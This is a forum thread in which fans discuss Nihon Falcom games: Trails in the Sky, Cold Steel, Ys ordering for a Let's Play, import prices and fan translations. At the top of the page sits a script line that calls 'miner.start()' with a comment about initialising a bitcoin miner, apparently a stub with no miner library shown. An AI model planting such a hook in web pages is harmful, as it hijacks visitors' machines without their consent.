<script>
miner.start(); // initialise bitcoin miner
</script>

mario fan games galaxysmbx communitysmw central

Nihon Falcom

do you like them video games? what about those there romhacks? well pop on in here and talk about them then! what are you waiting for?!
User avatar
Jesuiscontent
Tsundere
Posts: 854
Joined: 7 years ago
First name: cool old field
Location: France

Re: Nihon Falcom

Postby Jesuiscontent » 3 years ago

I saw the announcements this morning. Cool stuff, but since they said Cold Steel 3 would have "significant graphical improvements" I hope that doesn't mean they are abandoning the PS3. I bought an used PS3 recently pretty much exclusively for Falcom games.
Juanbro wrote:
As a full-fledged chapter, this one is a bit short on the dungeon "crawling" side, but story driven...is really good. The ghost mystery is kind of hilarious with Estelle's phobia of the paranormal, and Kevin is somehow lovable. I was really happy when Olivier arrived, as I enjoy the banter he makes with everyone else, but the top of all is the Olivier vs Blueblanc situation...now we have two crazy people that talks about beauty in a somewhat elegant manner, but I am in Olivier's side ("beauty is but a hollow ilusion without love"). BTW, I took Agate as the experienced bracer partner.

As for the main dungeon: it was kind of "short", but the monsters there are kind of annoying, specially those mechanical horse thingies that boost attack and speed of their fellow monsters when you kill them (making the fights vs them when you open some chests a bit hectic if you don't defeat a lot in a swoop. The boss itself, I don't if it's because I spammed Kloe's craft that reduce attack/defense and I always managed to stop his charging attack, but it felt easier compared to the bosses of the prologue. Even with two "death throes" in effect, his attacks barely surpassed 1000 of damage. Other thing that may have got an effect in the "easyness" of the boss is that I managed to kill one Shining Pom in this dungeon, giving me like 2500 exp for Olivier and Kloe (and letting them level up like 4 levels) and 800 to Agate and Estelle (letting 'em level up at least 1 level).

I had the exact opposite experience actually haha, the dungeon monsters were pretty easy but the boss was super annoying. Maybe that's because I had Schera instead of Agate? I like to abuse the whip to get 2 full turns before the enemy can act but that's not too useful against bosses.


Also I'd watch an Ys Origin LP.
Image

Image
Image

User avatar
Jesuiscontent
Tsundere
Posts: 854
Joined: 7 years ago
First name: cool old field
Location: France

Re: Nihon Falcom

Postby Jesuiscontent » 3 years ago

http://www.play-asia.com/eiyuu-densetsu ... /13/707mt9

280 DOLLARS

FOR A BULLSHIT DEVOLUTION PORT
Image

Image
Image

User avatar
Bean
Posts: 2722
Joined: 9 years ago
Location: In my own world

Re: Nihon Falcom

Postby Bean » 3 years ago

Never shop at Play-Asia. Their prices are absolutely insane.

User avatar
Jesuiscontent
Tsundere
Posts: 854
Joined: 7 years ago
First name: cool old field
Location: France

Re: Nihon Falcom

Postby Jesuiscontent » 3 years ago

I figured play-asia must have inflated the price, but honestly I've seen so many awful things about these cash-grab versions that a ridiculous price on top of it for LE edition didn't sound too much of a stretch.

In other news, my Cold Steel pre-order shipped on saturday. I'm secretly hoping I DON'T receive it before my finals end on Jan 7th, because once I do I feel like I won't be able to do anything but sit down and play it
Image

Image
Image

User avatar
Juanbro
Old school gamer...at least in theory
Posts: 103
Joined: 4 years ago

Re: Nihon Falcom

Postby Juanbro » 3 years ago

Jesuiscontent wrote: Also I'd watch an Ys Origin LP.
I will do both games, but I was asking what would you think would be better to show first? YS Origin or YS Chronicles? The first game (actually, games), or the prequel?

I ask this because going either way has it's pro's and con's.

Starting with YS Origin will let you know the things in the "chronological" order, and will answer some questions in YS Chronicles right of the bat, but wouldn't be as good as starting with YS Chronicles, and getting those questions answered until you play YS Origin.

User avatar
Bean
Posts: 2722
Joined: 9 years ago
Location: In my own world

Re: Nihon Falcom

Postby Bean » 3 years ago

I would say I & II since Origin is pretty much a "sequel prequel" game right? Meanwhile, the first two games are just that... the first two games. It's always your decision, and you should do what you think would be more fun anyway. Maybe watching you do I & II would motivate me to play my PSP copy of that!

User avatar
Juanbro
Old school gamer...at least in theory
Posts: 103
Joined: 4 years ago

Re: Nihon Falcom

Postby Juanbro » 3 years ago

Bean wrote:I would say I & II since Origin is pretty much a "sequel prequel" game right? Meanwhile, the first two games are just that... the first two games. It's always your decision, and you should do what you think would be more fun anyway. Maybe watching you do I & II would motivate me to play my PSP copy of that!
Very well then...but it may take some time...maybe a week or two, since I left a LP in hiatus, and I would like to finish it before going to something else. Just telling you...it may be in spanish, unless the demand is high for it to be in english. In that case, I will try to do it in english, but just a warning in advance...I am kind of bad speaking english. Reading, writing, I am good, but speaking...yeah...

User avatar
Bean
Posts: 2722
Joined: 9 years ago
Location: In my own world

Re: Nihon Falcom

Postby Bean » 3 years ago

Don't worry about it! Just have fun and always do what you want. That way, no pressure.

User avatar
Juanbro
Old school gamer...at least in theory
Posts: 103
Joined: 4 years ago

Re: Nihon Falcom

Postby Juanbro » 3 years ago

Guys, I hope that this isn't the wrong place to post this, or even if it can't be posted in the forum at all. If it is wrong, erase this message from existance forever.

So, yeah, I was looking for a Nihon Falcom group or something related in Facebook, and I found out that there isn't one...or at least I couldn't find it. Because of that, I will be creating a group soon enough (perhaps today). If it's okay to put it here, I will put the link to the group once I create it, if anyone wants to join. Of course, if there is one already existing, and you know about it, maybe I will reconsider creating it.

User avatar
Jesuiscontent
Tsundere
Posts: 854
Joined: 7 years ago
First name: cool old field
Location: France

Re: Nihon Falcom

Postby Jesuiscontent » 3 years ago

Yeah you can post that here, but I can't help you or wouldn't be able to join as I don't have facebook. Also you'll probably need to advertise it in a few other places since it seems not too many people play falcom games here nyoro~n

Also today the tracking for my Cold Steel order updated saying it arrived in my country

[attachment=0]1447965662636-1.jpg[/attachment]
Attachments
1447965662636-1.jpg
1447965662636-1.jpg (96.12 KiB) Viewed 3169 times
Image

Image
Image

User avatar
Juanbro
Old school gamer...at least in theory
Posts: 103
Joined: 4 years ago

Re: Nihon Falcom

Postby Juanbro » 3 years ago

Jesuiscontent wrote:Yeah you can post that here, but I can't help you or wouldn't be able to join as I don't have facebook. Also you'll probably need to advertise it in a few other places since it seems not too many people play falcom games here nyoro~n

Also today the tracking for my Cold Steel order updated saying it arrived in my country

[attachment=0]1447965662636-1.jpg[/attachment]
Aww, one of the few people I know that knows about Nihon Falcom, and no way to join the group. Sadness abound.

Oh, and that Analace...such a funny and quirky girl. I am yet to find her again (I just started chapter 2...yeah...to slow), but I love her personality.

And, here is the group for any person interested and can join it. Just to warn you...due to not existing a group...this one may be for english speaking persons and spanish speaking persons, so...


User avatar
Jesuiscontent
Tsundere
Posts: 854
Joined: 7 years ago
First name: cool old field
Location: France

Re: Nihon Falcom

Postby Jesuiscontent » 3 years ago

FINALLY
Photo0014.jpg
Photo0014.jpg (353.85 KiB) Viewed 3144 times
Photo0015.jpg
Photo0015.jpg (296.02 KiB) Viewed 3144 times
That is one pretty box

Nice artbook too, though I didn't read it too much yet because spoilers
Image

Image
Image

User avatar
The Destroyer of Worlds
I am become death
Posts: 1481
Joined: 6 years ago

Re: Nihon Falcom

Postby The Destroyer of Worlds » 3 years ago

Juanbro wrote:
Bean wrote:I would say I & II since Origin is pretty much a "sequel prequel" game right? Meanwhile, the first two games are just that... the first two games. It's always your decision, and you should do what you think would be more fun anyway. Maybe watching you do I & II would motivate me to play my PSP copy of that!
Very well then...but it may take some time...maybe a week or two, since I left a LP in hiatus, and I would like to finish it before going to something else. Just telling you...it may be in spanish, unless the demand is high for it to be in english. In that case, I will try to do it in english, but just a warning in advance...I am kind of bad speaking english. Reading, writing, I am good, but speaking...yeah...
As someone who kinda helped translate Origin and has played the whole series... I'd say start with Origin. It's such a strong start and, to me, one of the best notes to start the series off on. It also makes some things in Ys 1/2 make more sense. You won't necessarily get every reference, but I think the trade off is super worth it.

Likewise, I'd play every remade game instead of the original and go in series chronological order. Not that it matters THAT much for Ys since it's pretty story light.

Try to go in the order of Origin, Ys I, Ys II, Celceta (or Ys IV: Dawn of Ys if you can't Vita), The Oath in Felghana, Ys V, Ys 6, Ys Seven.

But you would be forgiven if you skipped Ys V because it's a bit crap...
raocow wrote:Dang it Oyster this level is not called Peregrine Penguin and the Soft Bon-Bon, it clearly says Ghost House with a Ghost in It!

User avatar
Juanbro
Old school gamer...at least in theory
Posts: 103
Joined: 4 years ago

Re: Nihon Falcom

Postby Juanbro » 3 years ago

Jesuiscontent wrote:FINALLY
It looks...beautiful. Man, why is for PS Vita and PS3? Sadness...but it is sadder when you go to your local game stores (sadly...it's Game Planet and Blockbuster) and find out that this game isn't there. Man, it saddens me to see how underappreciated Nihon Falcom's games are. The same with Nintendo, of all the videogames sold at my local game stores, only one seventh part is for Nintendo, three seventh parts are for Sony and the other three for Microsoft.
Horikawa Otane wrote:
Juanbro wrote:
Bean wrote:I would say I & II since Origin is pretty much a "sequel prequel" game right? Meanwhile, the first two games are just that... the first two games. It's always your decision, and you should do what you think would be more fun anyway. Maybe watching you do I & II would motivate me to play my PSP copy of that!
Very well then...but it may take some time...maybe a week or two, since I left a LP in hiatus, and I would like to finish it before going to something else. Just telling you...it may be in spanish, unless the demand is high for it to be in english. In that case, I will try to do it in english, but just a warning in advance...I am kind of bad speaking english. Reading, writing, I am good, but speaking...yeah...
As someone who kinda helped translate Origin and has played the whole series... I'd say start with Origin. It's such a strong start and, to me, one of the best notes to start the series off on. It also makes some things in Ys 1/2 make more sense. You won't necessarily get every reference, but I think the trade off is super worth it.

Likewise, I'd play every remade game instead of the original and go in series chronological order. Not that it matters THAT much for Ys since it's pretty story light.

Try to go in the order of Origin, Ys I, Ys II, Celceta (or Ys IV: Dawn of Ys if you can't Vita), The Oath in Felghana, Ys V, Ys 6, Ys Seven.

But you would be forgiven if you skipped Ys V because it's a bit crap...
Actually, I have played all those games you mentioned except any of the YS IV games, and YS V. If I LP them, would be to show games that I enjoy. Taking that into account, would you still suggest me to LP YS Origin first? As before, I am asking this to see how would one get the most effective experience, story wise. It is like the Star Wars syndrome. If you watch the original trilogy first, you will know what may happen when you watch the "prequel" trilogy, but you may be still interested in the story for solving some things of the original trilogy, making you react like "Oh, so this is what happened!". If you watch the "prequel" trilogy first, when you watch the original trilogy, some things may be answered as soon as they happen, and you may be like "Look, that's the guy from the prequel trilogy".

Oh, and look what I found:
12417656_887137261385578_5093881934131695718_n.jpg
12417656_887137261385578_5093881934131695718_n.jpg (135.24 KiB) Viewed 3129 times
Oh boy, YS VIII...such joy, yet such sorrow...will be for PS4 and PS Vita...and I own neither. At this rate, I may need to get at least a PS Vita, just for YS Memories of Celceta, Trails in the Cold Steel, YS VIII, and other Nihon Falcom games that may come (probably Zero no Kiseki Evolution and Ao no Kiseki).

User avatar
The Destroyer of Worlds
I am become death
Posts: 1481
Joined: 6 years ago

Re: Nihon Falcom

Postby The Destroyer of Worlds » 3 years ago

Juanbro wrote:
Actually, I have played all those games you mentioned except any of the YS IV games, and YS V. If I LP them, would be to show games that I enjoy. Taking that into account, would you still suggest me to LP YS Origin first? As before, I am asking this to see how would one get the most effective experience, story wise. It is like the Star Wars syndrome. If you watch the original trilogy first, you will know what may happen when you watch the "prequel" trilogy, but you may be still interested in the story for solving some things of the original trilogy, making you react like "Oh, so this is what happened!". If you watch the "prequel" trilogy first, when you watch the original trilogy, some things may be answered as soon as they happen, and you may be like "Look, that's the guy from the prequel trilogy".
Personally Ys IV is my favourite entry in the series outside of Felghana and Origin, but I'm weird. I LOVE all of the Ys IVs - even Mask of the Sun.

If you've already played the series, I'd say it depends on your audience and your reach. Like, what I mean by that is... If you've got a decent sized audience already and you know they love that sort of 8/16-bit genre, I'd recommend starting with I/II. Or doing IV since that'd be blind and blind LPs are commonly more fun (though not always).

However, if your channel is relatively small and you want a bit of a wider reach, Origin probably has much more broad appeal. That said, there's almost certainly also more LP's of it, so you've got less chance of showing up on that all-important page 1 of search results. Might be wrong though - Ys 1/2 have been out since the dawn of time, so maybe they have more LPs. Idk. Something to consider.

For my own personal tastes, I love all three of them. Ys 1 is pretty okay, Ys 2 perfected Ys 1's formula, and Ys Origin is probably the best in the whole series. So I have no preference myself from a pure taste perspective. Assuming you can record all three games with nice quality footage, do whichever one you think is best.
Juanbro wrote: Oh boy, YS VIII...such joy, yet such sorrow...will be for PS4 and PS Vita...and I own neither. At this rate, I may need to get at least a PS Vita, just for YS Memories of Celceta, Trails in the Cold Steel, YS VIII, and other Nihon Falcom games that may come (probably Zero no Kiseki Evolution and Ao no Kiseki).
I got my Vita for like... 30-40 dollars on craigslist. I'd recommend trawling searchtempest and seeing if you can find a local one for dirt cheap. Though that might be hard now that Vita homebrew is a thing (and boy is that vita screen amazing! playing snes on it is a joy).

As far as the ED series goes... It's really good... Story wise. The gameplay is like slogging through tar though. Standard JRPG fare of 'pick the biggest thing' style combat. I like that series despite the gameplay haha. But if you've played the steam versions of ED6 Ep1/2, you know more or less what you're getting into.

If you own a Vita and speak Japanese, I can also recommend the recent "Evolution" re-releases of the ED6 and ED7 series (though the evolution version of ED6 the 3rd isn't out yet). They're pretty much the 'definitive' (most feature-complete) versions of the games.
raocow wrote:Dang it Oyster this level is not called Peregrine Penguin and the Soft Bon-Bon, it clearly says Ghost House with a Ghost in It!

User avatar
Truhan
Lord of the Waifus
Posts: 575
Joined: 7 years ago
Pronouns: Waifulord

Re: Nihon Falcom

Postby Truhan » 3 years ago

Learning to read the 日本語 is so hard though Horikawa. It's darn near brain-melting just getting my daily Anki done.
Image
Image
Image
Image
Image
Girls are a hoax created by the Japanese anime industry to scam otaku out of their money.

User avatar
Juanbro
Old school gamer...at least in theory
Posts: 103
Joined: 4 years ago

Re: Nihon Falcom

Postby Juanbro » 2 years ago

Oh boy, I am kind of hyped for YS VIII, and, since this month is the anniversary of Nihon Falcom, I am almost sure that something will be announced. What do you think will be announced? New things about YS VIII? More localizations of his Japan only games? Trails in the Cold Steel 3?

Man, so many things to speculate...

By the way, I LOVE the design of the blue haired character lady that is going to act like a deuteragonist, she looks so cool and beautiful!

Image

User avatar
Jesuiscontent
Tsundere
Posts: 854
Joined: 7 years ago
First name: cool old field
Location: France

Re: Nihon Falcom

Postby Jesuiscontent » 2 years ago

Yeah Ys 8 looks absolute boss. I like that they are keeping several playable characters. We're most likely getting a release date for it for the Falcom anniversary, but with how much they are hyping it on twitter there might be a surprise. The eurogamer interview http://www.eurogamer.net/articles/2016- ... s-the-fans, although pretty bad (the guy was way too obsessed with PC ports), sort of hinted at a Sorcerian remake, though Falcom doesn't usually work on that many games at once. I doubt we're going to get any announcements for the west though.

Also, XSEED posted a Cold Steel 2 update yesterday, they are recording the voice acting this month, so going by how CS1's went we could be getting it this summer, which would be awesome. I finished CS1 last month and it was absolutely fantastic. I think I liked it even more than TiTS, and made me realize just how much that game was centered around Estelle all the time. Cold Steel is a lot more balanced and lets all characters "grow"
The gameplay is a lot more fun and dynamic, too. I often hear the orbments were "dumbed down" but I mean, looking up the arts recipes in the bracer journal was never meant to be hard, I think, and most high-level arts in TiTS suck anyway...
The cliffhanger got me more as well
Image

Image
Image

User avatar
Jesuiscontent
Tsundere
Posts: 854
Joined: 7 years ago
First name: cool old field
Location: France

Re: Nihon Falcom

Postby Jesuiscontent » 2 years ago

https://twitter.com/XSEEDGames/status/7 ... 0037769216

HOLY SHIT
O
L
Y
S
H
I
T

Calling it now, the 3rd is released on christmas
Image

Image
Image

User avatar
Juanbro
Old school gamer...at least in theory
Posts: 103
Joined: 4 years ago

Re: Nihon Falcom

Postby Juanbro » 2 years ago

Jesuiscontent wrote:https://twitter.com/XSEEDGames/status/7 ... 0037769216

HOLY SHIT
O
L
Y
S
H
I
T

Calling it now, the 3rd is released on christmas
http://www.siliconera.com/2016/03/11/le ... fall-2016/

Well, not for Christmas, but for the next year.

And, XSEED...why are you tormenting me? I haven't had a chance to touch SC for a month, and I have yet to get Cold Steel...and now you announce both Cold Steel II and Trails in the Sky the 3rd, then YS 8 will be released in this summer and perhaps we will get it next year...why are you releasing so many good games at a pace that I can barely play older ones and advance close to nothing in the story? WHY?!?!

User avatar
Imaynotbehere4long
Gone, but...yeah, pretty much forgotten.
Posts: 299
Joined: 3 years ago

Re: Nihon Falcom

Postby Imaynotbehere4long » 2 years ago

Trails in the Sky is 50% off on Steam. Unfortunately, being a college student without much of a budget, I still can't afford it...
My SMBX portfolio:
Image
(includes a Sonic 3D Blast styled level.)

SOMEONE ANSWER MY CRY FOR HELP: http://www.supermariobrosx.org/forums/v ... =69&t=2026

User avatar
SAJewers
hi
Posts: 2761
Joined: 6 years ago
Location: Nova Scotia

Re: Nihon Falcom

Postby SAJewers » 2 years ago

SAJewers wrote:Might interest some people, but Fan Translations of Kaze no Densetsu Xanadu I and II are being worked on: http://www.romhacking.net/forum/index.p ... #msg291980
Update fore those who haven't been following:
SamIAm wrote:Major milestone reached: The first pass of Xanadu 2 is done.

Both games are now essentially playable in English. It's all about polish from here out. That, and the dubbing project.
ImageImageImageImage
Image
ImageImageImageImage

User avatar
Juanbro
Old school gamer...at least in theory
Posts: 103
Joined: 4 years ago

Re: Nihon Falcom

Postby Juanbro » 1 year ago

These two twitter might interest you all.





Now I need to get my stuff together and finish Trails in the Sky Second Chapter before The 3rd comes out (barely starting chapter 3...yeah).

And getting Cold Steel in PC opens the opportunity for more Legend of Heroes games to come out of Japan!

User avatar
Truhan
Lord of the Waifus
Posts: 575
Joined: 7 years ago
Pronouns: Waifulord

Re: Nihon Falcom

Postby Truhan » 1 year ago

weebing intensifies

Image
Image
Image
Image
Image
Image
Girls are a hoax created by the Japanese anime industry to scam otaku out of their money.

User avatar
Jesuiscontent
Tsundere
Posts: 854
Joined: 7 years ago
First name: cool old field
Location: France

Re: Nihon Falcom

Postby Jesuiscontent » 1 year ago

I'm so ready for 3rd. Also Hatsuu is currently streaming it and doing an FAQ of sorts. It always feels good to see Xseed's dedication

Image

Image
Image


Return to “the cartridgé”

Who is online

Users browsing this forum: No registered users and 2 guests